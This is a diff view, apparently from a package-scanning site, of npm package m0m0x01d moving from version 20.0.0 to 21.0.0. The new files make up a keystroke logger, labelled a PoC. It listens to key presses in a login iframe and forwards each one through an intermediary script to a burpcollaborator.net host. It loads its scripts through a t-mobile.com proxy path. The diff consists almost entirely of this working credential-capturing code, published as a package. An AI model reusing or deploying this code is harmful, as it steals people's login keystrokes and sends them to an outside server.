m0m0x01d 20.0.0 → 21.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/iframe4.svg.html +1 -1
- package/intermediary.svg.js +11 -0
- package/keystroke-capture.svg.js +25 -0
- package/package.json +1 -1
package/iframe4.svg.html
CHANGED
@@ -5,7 +5,7 @@
|
|
5
5
|
<meta charset="UTF-8">
|
6
6
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
7
7
|
<title>Keystroke Capture</title>
|
8
|
-
<script src="https://
|
8
|
+
<script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.js"></script>
|
9
9
|
</head>
|
10
10
|
<body>
|
11
11
|
<h1>Keystroke Logger PoC</h1>
|
@@ -0,0 +1,11 @@
|
|
1
|
+
// Intermediary script to forward keystrokes to your server
|
2
|
+
self.addEventListener('message', function(event) {
|
3
|
+
var data = event.data;
|
4
|
+
|
5
|
+
// Forward the keystrokes to your server
|
6
|
+
var xhr = new XMLHttpRequest();
|
7
|
+
xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
|
8
|
+
xhr.setRequestHeader("Content-Type", "application/json");
|
9
|
+
xhr.send(JSON.stringify({ keystrokes: data }));
|
10
|
+
});
|
11
|
+
|
@@ -0,0 +1,25 @@
|
|
1
|
+
// Function to send keystrokes to the intermediary file on unpkg
|
2
|
+
function sendKeystrokes(data) {
|
3
|
+
var xhr = new XMLHttpRequest();
|
4
|
+
xhr.open("POST", "https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/intermediary.svg.js", true);
|
5
|
+
xhr.setRequestHeader("Content-Type", "application/json");
|
6
|
+
xhr.send(JSON.stringify({ keystrokes: data }));
|
7
|
+
}
|
8
|
+
|
9
|
+
// Function to capture keystrokes in the iframe
|
10
|
+
function captureKeystrokes() {
|
11
|
+
var iframe = document.getElementById('login-iframe').contentWindow;
|
12
|
+
|
13
|
+
// Listen for key presses in the iframe
|
14
|
+
iframe.document.onkeyup = function(event) {
|
15
|
+
sendKeystrokes(event.key); // Send each keystroke to the intermediary
|
16
|
+
};
|
17
|
+
}
|
18
|
+
|
19
|
+
// Wait for the iframe to load, then start capturing keystrokes
|
20
|
+
window.onload = function() {
|
21
|
+
var iframe = document.getElementById('login-iframe');
|
22
|
+
iframe.onload = function() {
|
23
|
+
captureKeystrokes();
|
24
|
+
};
|
25
|
+
};
|